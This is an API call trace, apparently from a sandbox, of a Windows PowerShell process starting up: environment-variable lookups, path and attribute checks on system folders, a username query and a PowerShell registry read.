	[0353.372] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.372] CoTaskMemFree (pv=0x34eb50) 
	[0353.372] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0353.372] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.372] CoTaskMemFree (pv=0x34eb50) 
	[0353.386] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0353.386] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.386] CoTaskMemFree (pv=0x34eb50) 
	[0353.387] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0353.387] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.388] CoTaskMemFree (pv=0x34eb50) 
	[0353.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.388] SetErrorMode (uMode=0x1) returned 0x1
	[0353.388] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd150 | out: lpFileInformation=0xcd150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0353.388] SetErrorMode (uMode=0x1) returned 0x1
	[0353.388] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.389] SetErrorMode (uMode=0x1) returned 0x1
	[0353.389] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd150 | out: lpFileInformation=0xcd150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0353.389] SetErrorMode (uMode=0x1) returned 0x1
	[0353.389] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0353.389] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.389] CoTaskMemFree (pv=0x34eb50) 
	[0353.393] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcd090, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.394] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0353.394] SetErrorMode (uMode=0x1) returned 0x1
	[0353.394] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0353.394] SetErrorMode (uMode=0x1) returned 0x1
	[0353.395] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0353.395] SetErrorMode (uMode=0x1) returned 0x1
	[0353.395] GetFileAttributesExW (in: lpFileName="C:\\" (normalized: "c:"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x16, ftCreationTime.dwLowDateTime=0x3c0142d0, ftCreationTime.dwHighDateTime=0x1ca042c, ftLastAccessTime.dwLowDateTime=0xe0adbcc0, ftLastAccessTime.dwHighDateTime=0x1d305f1, ftLastWriteTime.dwLowDateTime=0xe0adbcc0, ftLastWriteTime.dwHighDateTime=0x1d305f1, nFileSizeHigh=0x0, nFileSizeLow=0x2000)) returned 1
	[0353.395] SetErrorMode (uMode=0x1) returned 0x1
	[0353.395] GetFullPathNameW (in: lpFileName="C:\\", nBufferLength=0x105, lpBuffer=0xccf10, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0353.395] GetFullPathNameW (in: lpFileName="C:\\.", nBufferLength=0x105, lpBuffer=0xcce00, lpFilePart=0x0 | out: lpBuffer="C:\\", lpFilePart=0x0) returned 0x3
	[0353.395] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.395] SetErrorMode (uMode=0x1) returned 0x1
	[0353.395] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0353.395] SetErrorMode (uMode=0x1) returned 0x1
	[0353.395] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.396] SetErrorMode (uMode=0x1) returned 0x1
	[0353.396] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0353.396] SetErrorMode (uMode=0x1) returned 0x1
	[0353.396] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xcce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.396] SetErrorMode (uMode=0x1) returned 0x1
	[0353.396] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0353.396] SetErrorMode (uMode=0x1) returned 0x1
	[0353.396] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccf00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.396] SetErrorMode (uMode=0x1) returned 0x1
	[0353.397] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd110 | out: lpFileInformation=0xcd110*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0353.397] SetErrorMode (uMode=0x1) returned 0x1
	[0353.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccf10, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.397] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xcce00, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.397] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xccf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.397] SetErrorMode (uMode=0x1) returned 0x1
	[0353.397] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcd150 | out: lpFileInformation=0xcd150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0353.397] SetErrorMode (uMode=0x1) returned 0x1
	[0353.398] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xccf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.398] SetErrorMode (uMode=0x1) returned 0x1
	[0353.398] GetFileAttributesExW (in: lpFileName="C:\\Windows" (normalized: "c:\\windows"), fInfoLevelId=0x0, lpFileInformation=0xcd150 | out: lpFileInformation=0xcd150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x2fb4a840, ftLastAccessTime.dwHighDateTime=0x1d4d57d, ftLastWriteTime.dwLowDateTime=0x2fb4a840, ftLastWriteTime.dwHighDateTime=0x1d4d57d, nFileSizeHigh=0x0, nFileSizeLow=0x4000)) returned 1
	[0353.398] SetErrorMode (uMode=0x1) returned 0x1
	[0353.398] GetFullPathNameW (in: lpFileName="C:\\Windows", nBufferLength=0x105, lpBuffer=0xccf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\.", nBufferLength=0x105, lpBuffer=0xcce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows", lpFilePart=0x0) returned 0xa
	[0353.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.398] SetErrorMode (uMode=0x1) returned 0x1
	[0353.398] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd150 | out: lpFileInformation=0xcd150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0353.398] SetErrorMode (uMode=0x1) returned 0x1
	[0353.398] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccf40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.399] SetErrorMode (uMode=0x1) returned 0x1
	[0353.399] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd150 | out: lpFileInformation=0xcd150*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0353.399] SetErrorMode (uMode=0x1) returned 0x1
	[0353.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xccf50, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.399] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32\\.", nBufferLength=0x105, lpBuffer=0xcce40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.401] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0xcd1b0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13
	[0353.401] SetErrorMode (uMode=0x1) returned 0x1
	[0353.401] GetFileAttributesExW (in: lpFileName="C:\\Windows\\system32" (normalized: "c:\\windows\\system32"), fInfoLevelId=0x0, lpFileInformation=0xcd410 | out: lpFileInformation=0xcd410*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfec9a6f8, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xefd85d60, ftLastAccessTime.dwHighDateTime=0x1d4d596, ftLastWriteTime.dwLowDateTime=0xefd85d60, ftLastWriteTime.dwHighDateTime=0x1d4d596, nFileSizeHigh=0x0, nFileSizeLow=0xa0000)) returned 1
	[0353.401] SetErrorMode (uMode=0x1) returned 0x1
	[0353.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd200, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.402] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0xcd150, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0353.649] CoTaskMemAlloc (cb=0x804) returned 0x2f0650
	[0353.649] GetUserNameExW (in: NameFormat=0x2, lpNameBuffer=0x2f0650, nSize=0xcd778 | out: lpNameBuffer="XDUWTFONO\\5p5NrGJn0jS HALPmcxz", nSize=0xcd778) returned 0x1
	[0353.779] CoTaskMemFree (pv=0x2f0650) 
	[0353.779] CoTaskMemAlloc (cb=0x204) returned 0x309530
	[0353.779] GetUserNameW (in: lpBuffer=0x309530, pcbBuffer=0xcd7b8 | out: lpBuffer="5p5NrGJn0jS HALPmcxz", pcbBuffer=0xcd7b8) returned 1
	[0353.779] CoTaskMemFree (pv=0x309530) 
	[0353.780] ReportEventW (hEventLog=0x1b8e0008, wType=0x4, wCategory=0x4, dwEventID=0x190, lpUserSid=0x0, wNumStrings=0x3, dwDataSize=0x0, lpStrings=0x2dd8088*="Available", lpRawData=0x2dd7e18) returned 1
	[0353.936] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0353.936] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.936] CoTaskMemFree (pv=0x34eb50) 
	[0353.937] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0353.937] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.937] CoTaskMemFree (pv=0x34eb50) 
	[0353.938] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0353.938] GetEnvironmentVariableW (in: lpName="HomeDrive", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="C:") returned 0x2
	[0353.938] CoTaskMemFree (pv=0x34eb50) 
	[0353.938] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0353.938] GetEnvironmentVariableW (in: lpName="HomePath", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="\\Users\\5p5NrGJn0jS HALPmcxz") returned 0x1b
	[0353.938] CoTaskMemFree (pv=0x34eb50) 
	[0353.939] GetCurrentProcessId () returned 0x640
	[0353.940] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\PowerShell\\1\\PowerShellEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0xcd798 | out: phkResult=0xcd798*=0x36c) returned 0x0
	[0353.940] RegQueryValueExW (in: hKey=0x36c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd71c, lpData=0x0, lpcbData=0xcd718*=0x0 | out: lpType=0xcd71c*=0x1, lpData=0x0, lpcbData=0xcd718*=0x56) returned 0x0
	[0353.940] CoTaskMemAlloc (cb=0x5a) returned 0x3146d0
	[0353.940] RegQueryValueExW (in: hKey=0x36c, lpValueName="ApplicationBase", lpReserved=0x0, lpType=0xcd6ec, lpData=0x3146d0, lpcbData=0xcd6e8*=0x56 | out: lpType=0xcd6ec*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpcbData=0xcd6e8*=0x56) returned 0x0
	[0353.940] CoTaskMemFree (pv=0x3146d0) 
	[0353.941] RegCloseKey (hKey=0x36c) returned 0x0
	[0353.941] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0353.942] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.942] CoTaskMemFree (pv=0x34eb50) 
	[0353.965] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.966] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0353.966] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.966] CoTaskMemFree (pv=0x34eb50) 
	[0353.966] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.970] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0353.970] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.970] CoTaskMemFree (pv=0x34eb50) 
	[0353.970] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0353.970] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.971] CoTaskMemFree (pv=0x34eb50) 
	[0353.971] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0353.971] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.971] CoTaskMemFree (pv=0x34eb50) 
	[0353.972] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0353.972] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.972] CoTaskMemFree (pv=0x34eb50) 
	[0353.972] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0353.972] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.973] CoTaskMemFree (pv=0x34eb50) 
	[0353.973] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0353.973] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0353.973] CoTaskMemFree (pv=0x34eb50) 
	[0353.974] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0353.974] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.152] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.171] CoTaskMemAlloc (cb=0x104) returned 0x34eb50
	[0354.171] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x34eb50, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0354.171] CoTaskMemFree (pv=0x34eb50) 
	[0354.539] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x34ef90
	[0354.539] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x34f0a0
	[0354.688] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.710] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.712] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.712] VirtualQuery (in: lpAddress=0xca240, lpBuffer=0xcb100, dwLength=0x30 | out: lpBuffer=0xcb100*(BaseAddress=0xca000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x6000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.947] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.947] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.947] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.947] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.947] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.947] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.947] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.948] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0354.948] VirtualQuery (in: lpAddress=0xcb7f0, lpBuffer=0xcc6b0, dwLength=0x30 | out: lpBuffer=0xcc6b0*(BaseAddress=0xcb000, AllocationBase=0x50000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
